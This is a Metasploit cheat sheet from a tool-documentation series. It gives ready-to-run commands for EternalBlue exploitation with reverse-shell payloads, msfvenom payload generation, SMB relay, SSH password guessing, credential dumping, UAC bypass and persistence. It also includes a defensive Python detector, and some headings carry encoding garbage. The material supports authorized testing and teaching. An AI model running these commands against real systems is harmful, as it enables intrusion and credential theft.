
# Metasploit - Penetration Testing Framework

Metasploit is a computer security framework that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It's one of the most popular penetration testing tools and includes a suite of tools for developing and executing exploit code against remote targets.

## 🎯 Purpose

- **Vulnerability Validation**: Test whether systems are vulnerable to specific exploits
- **Penetration Testing**: Conduct authorized security assessments
- **Exploit Development**: Create and test custom exploits
- **Security Research**: Study vulnerabilities and attack techniques

## 🚀 Basic Usage

### Starting Metasploit

```bash
# Start Metasploit console
msfconsole

# Start quietly (suppress the banner)
msfconsole -q

# Load a resource script at startup
msfconsole -r script.rc
```

### Basic Commands

```bash
# Search for exploits
search type:exploit platform:windows

# Use an exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show exploit options
show options

# Set target
set RHOSTS 192.168.1.100

# Run the exploit
exploit
```

## 🔧 Core Commands

### Information Gathering

```bash
# Search exploits
search ms17-010
search type:exploit platform:linux
search cve:2021

# Get exploit information
info exploit/windows/smb/ms17_010_eternalblue

# Show available targets
show targets

# Show available payloads
show payloads
```

### Exploit Configuration

```bash
# Set required options
set RHOSTS 192.168.1.0/24
set RHOST 192.168.1.100
set LHOST 192.168.1.10
set LPORT 4444

# Show current settings
show options

# Check if target is vulnerable (only for modules that implement check)
check
```

### Payload Management

```bash
# Set payload
set payload windows/meterpreter/reverse_tcp

# Generate standalone payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > shell.exe

# Show advanced module and payload options (show options lists the basic ones)
show advanced
```

## 🎯 Common Attack Scenarios

### Windows Exploitation

```bash
# MS17-010 EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

# SMB relay attack
use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.100
exploit
```

### Linux Exploitation

```bash
# SSH login check against a password list
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.0/24
set USERNAME root
set PASS_FILE /usr/share/wordlists/passwords.txt
run

# Web application attacks
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS 192.168.1.100
set TARGETURI /struts2-app/
exploit
```

### Web Application Testing

```bash
# Directory brute-force (dir_scanner enumerates directories from a wordlist)
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
run

# SQL injection testing
use auxiliary/scanner/http/sqlmap
set RHOSTS 192.168.1.100
set TARGETURI /login.php
run
```

πŸ“ Installation ​

Debian/Ubuntu ​

bash
# Install from repository
sudo apt update
sudo apt install metasploit-framework

# Initialize database
sudo msfdb init

From Source ​

bash
# Install dependencies
sudo apt install git ruby-dev build-essential

# Clone repository
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install

Kali Linux ​

bash
# Pre-installed, just update
sudo apt update && sudo apt upgrade metasploit-framework

βš™οΈ Database Management ​

Database Operations ​

bash
# Check database status
db_status

# Connect to database
db_connect

# Create workspace
workspace -a target_company

# List workspaces
workspace

# Import scan results
db_import nmap_scan.xml

Host and Service Management ​

bash
# List discovered hosts
hosts

# List discovered services
services

# Add host manually
hosts -a 192.168.1.100 -o Windows

# Search for specific services
services -p 445

## 💡 Meterpreter Commands

### Basic Meterpreter

```bash
# Get system information
sysinfo

# Get current user
getuid

# List processes
ps

# Migrate to another process
migrate 1234

# Get shell
shell
```

### File System Operations

```bash
# Change directory
cd C:\Windows

# List directory
ls

# Download file
download C:\Windows\System32\drivers\etc\hosts

# Upload file
upload payload.exe C:\temp\

# Search for files
search -f *.txt
```

### Privilege Escalation

```bash
# Get system privileges
getsystem

# Load privilege escalation extension
use priv

# Bypass UAC
use exploit/windows/local/bypassuac_injection
```

## 🔧 Advanced Features

### Post-Exploitation Modules

```bash
# Harvest credentials
use post/windows/gather/hashdump
use post/windows/gather/credentials/windows_autologin

# Gather system information
use post/windows/gather/enum_system
use post/linux/gather/enum_system

# Persistence
use exploit/windows/local/persistence
use exploit/linux/local/cron_persistence
```

### Auxiliary Modules

```bash
# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# SMB enumeration
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# SNMP scanning
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.0/24
run
```

### Resource Scripts

Create automation scripts:

```ruby
# resource_script.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS file:/tmp/targets.txt
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set ExitOnSession false
exploit -j
```

## 🚨 Important Notes

- **Legal Authorization**: Only use on systems you own or have explicit permission to test
- **Responsible Disclosure**: Report vulnerabilities through proper channels
- **Environmental Impact**: Some exploits may cause system instability
- **Detection**: Modern security solutions may detect Metasploit signatures
- **Updates**: Keep the framework updated for the latest exploits and fixes
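The "Detection" note above is worth making concrete. This added example (not from the page or from Metasploit) runs simple detection logic over constructed flow-log lines: it flags connections to the default handler port 4444 used throughout this page, and flags a single source touching port 445 on many hosts, which is what the `smb_version` sweep over 192.168.1.0/24 looks like from the network side. The log format and thresholds are assumptions to be adapted to your own sensors.

```python
import re
from collections import defaultdict

# Constructed flow-log lines (not from any real system): one host calling back to the
# default LPORT 4444, and one host touching 445 across the subnet.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z ALLOW tcp 192.168.1.100:50123 -> 192.168.1.10:4444
2024-01-01T10:00:02Z ALLOW tcp 192.168.1.100:50124 -> 192.168.1.10:443
2024-01-01T10:00:03Z ALLOW tcp 192.168.1.10:40000 -> 192.168.1.20:445
2024-01-01T10:00:03Z ALLOW tcp 192.168.1.10:40001 -> 192.168.1.21:445
2024-01-01T10:00:03Z ALLOW tcp 192.168.1.10:40002 -> 192.168.1.22:445
2024-01-01T10:00:03Z ALLOW tcp 192.168.1.10:40003 -> 192.168.1.23:445
2024-01-01T10:00:04Z ALLOW tcp 192.168.1.50:50000 -> 192.168.1.60:445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
DEFAULT_HANDLER_PORTS = {4444}  # Metasploit's default LPORT; tune to your environment
SWEEP_THRESHOLD = 4             # distinct hosts on port 445 from one source (assumed)


def analyze(log_text):
    """Return a list of (rule, source, detail) alerts for the given log text."""
    alerts = []
    smb_targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing the detector
        src, dst, dport = m["src"], m["dst"], int(m["dport"])
        if m["proto"] == "tcp" and dport in DEFAULT_HANDLER_PORTS:
            alerts.append(("default_handler_port", src, f"{dst}:{dport}"))
        if dport == 445:
            smb_targets[src].add(dst)
    # A sweep is one source reaching SWEEP_THRESHOLD or more distinct hosts on 445
    for src, dsts in sorted(smb_targets.items()):
        if len(dsts) >= SWEEP_THRESHOLD:
            alerts.append(("smb_sweep", src, f"{len(dsts)} hosts on 445"))
    return alerts
```

Changing the listener port in the resource script defeats the first rule, so the sweep rule, which keys on behaviour rather than a constant, is the more durable of the two.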

## 📊 Best Practices

- **Scope Definition**: Clearly define testing boundaries
- **Documentation**: Keep detailed logs of all activities
- **Cleanup**: Remove artifacts after testing
- **Reporting**: Provide clear, actionable reports
- **Training**: Continuous learning and skill development

Part of the HackerHub.me tool documentation series